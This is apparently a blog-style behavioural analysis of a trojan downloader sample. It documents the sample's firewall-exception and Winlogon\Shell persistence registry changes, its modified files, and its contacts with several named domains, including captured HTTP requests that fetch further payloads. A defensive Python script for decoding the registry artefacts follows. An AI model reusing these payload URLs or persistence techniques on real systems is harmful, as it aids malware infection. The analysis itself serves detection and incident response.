I received a suspicious file from my colleague this morning and did a simple behaviour analysis on it.
Analysis Report:
##############
Filename: ~.exe
MD5: 3A03A20BFEFE3FDD01659D47D2ED76C8
Virus Found: W32/Sality (McAfee), TROJ_DLOADER.XOP (TrendMicro), Mal/Generic-A (Sophos), Trojan-Downloader.Win32.Agent.brxr (Kaspersky, F-Secure)
On the VirusTotal website, 36 out of 40 AV engines detected it.
Registry values added:
================
1> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"
2> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"
The two registry values above add the malware to the Windows Firewall exceptions list, with the entry named "ipsec" (shown above).
3> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\24: 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00
4> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.xml\1: 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00
The binary data in 3> and 4> is a RecentDocs entry: the UTF-16 document name "sec1.xml" followed by the shortcut name "sec1.xml.lnk".
5> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\~.rkr: 08 00 00 00 06 00 00 00 80 F4 57 31 2D CD C9 01
The UserAssist value name is ROT13-encoded; it decodes to UEME_RUNPATH:C:\Documents and Settings\Owner\Desktop\~.exe, i.e. Explorer recorded the sample being launched from the desktop.
6> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\@C:\WINDOWS\system32\SHELL32.dll,-22913: "Shows the disk drives and hardware connected to this computer."
7> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\~.exe: "~"
Registry values modified:
==================
1> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000010
2> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000011
3> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe"
4> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe "C:\Documents and Settings\Owner\Desktop\~.exe""
The Winlogon\Shell value now starts the malware alongside Explorer.exe at every logon; this is the sample's persistence mechanism.
5> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x00000039
6> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x0000003A
7> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x00000039
8> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x0000003A
Files modified:
==========
1> C:\Documents and Settings\Owner\Cookies\index.dat
2> C:\Documents and Settings\Owner\Local Settings\History\History.IE5\index.dat
3> C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\index.dat
4> C:\WINDOWS\system.ini
5> C:\WINDOWS\system32\config\software.LOG
6> C:\WINDOWS\system32\config\system.LOG
Other behaviours:
=============
System connecting to:
1> peskostruikaz.com:80
The following HTTP request was found:
GET /auq.php?8e54ce=1332546&id=2554099245826 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57
Host: peskostruikaz.com
Cache-Control: no-cache
2> johnsonbodyshop.com:80
No request after initial handshake.
3> shopatforgetmenot.com:80
The following HTTP request was found:
GET /images/mainlogo.gif?58fb0a=833062&id=2554099245826 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57
Host: shopatforgetmenot.com
Cache-Control: no-cache
4> corporateshelters.com:80
No request after initial handshake.
It seems the malware is trying to download further malicious payloads from "peskostruikaz.com/auq.php" and "shopatforgetmenot.com/images/mainlogo.gif". Both requests carry the same id parameter (2554099245826) and the same spoofed Opera User-Agent.
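The registry artefacts in the report above can be decoded and triaged with a short script. This is an added example written for this page, not part of the original analysis: it takes the UserAssist, RecentDocs and Winlogon\Shell values transcribed from the report as constructed input, assumes the Windows XP UserAssist layout (ROT13 value name; counter stored as count + 5; last-run FILETIME), decodes them, and tags each key with the behaviour it evidences.

```python
import codecs
import re
from datetime import datetime, timedelta, timezone

# Constructed sample input, transcribed from the analysis report above
USERASSIST_KEY = r"HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\~.rkr"
USERASSIST_DATA = "08 00 00 00 06 00 00 00 80 F4 57 31 2D CD C9 01"
RECENTDOCS_DATA = "73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00"
WINLOGON_SHELL = (r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell",
                  r'"Explorer.exe "C:\Documents and Settings\Owner\Desktop\~.exe""')
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def decode_userassist(key: str, hex_data: str) -> dict:
    """Decode an XP-era UserAssist\\Count entry (assumed layout): ROT13 value
    name, then session id (4 bytes), run counter (4 bytes, stored as count + 5)
    and last-run FILETIME (8 bytes), all little-endian."""
    name = codecs.decode(key.split("\\Count\\", 1)[1], "rot_13")
    raw = bytes.fromhex(hex_data)
    runs = int.from_bytes(raw[4:8], "little") - 5
    filetime = int.from_bytes(raw[8:16], "little")  # 100 ns ticks since 1601-01-01
    last_run = FILETIME_EPOCH + timedelta(microseconds=filetime // 10)
    return {"name": name, "run_count": runs, "last_run": last_run}

def decode_recentdocs(hex_data: str) -> dict:
    """Decode a RecentDocs MRU blob: a NUL-terminated UTF-16LE document name
    followed by a shell item that carries the ASCII .lnk shortcut name."""
    raw = bytes.fromhex(hex_data)
    i = 0
    while i < len(raw) and raw[i:i + 2] != b"\x00\x00":  # find the UTF-16 terminator
        i += 2
    document = raw[:i].decode("utf-16-le")
    m = re.search(rb"[\x20-\x7e]+\.lnk", raw[i + 2:])
    return {"document": document, "shortcut": m.group().decode() if m else None}

def classify(key: str, value: str) -> str:
    """Tag a registry observation with the behaviour it evidences."""
    k = key.lower()
    if "\\firewallpolicy\\" in k and "\\authorizedapplications\\list\\" in k:
        return "firewall-exception"      # sample added itself to the firewall allow list
    if k.endswith("\\winlogon\\shell"):  # anything beyond Explorer.exe runs at every logon
        return "benign" if value.strip('"') == "Explorer.exe" else "winlogon-shell-persistence"
    if "\\userassist\\" in k:
        return "userassist-execution"
    if "\\explorer\\recentdocs\\" in k:
        return "recentdocs"
    return "other"

if __name__ == "__main__":
    print(decode_userassist(USERASSIST_KEY, USERASSIST_DATA), decode_recentdocs(RECENTDOCS_DATA), classify(*WINLOGON_SHELL))
```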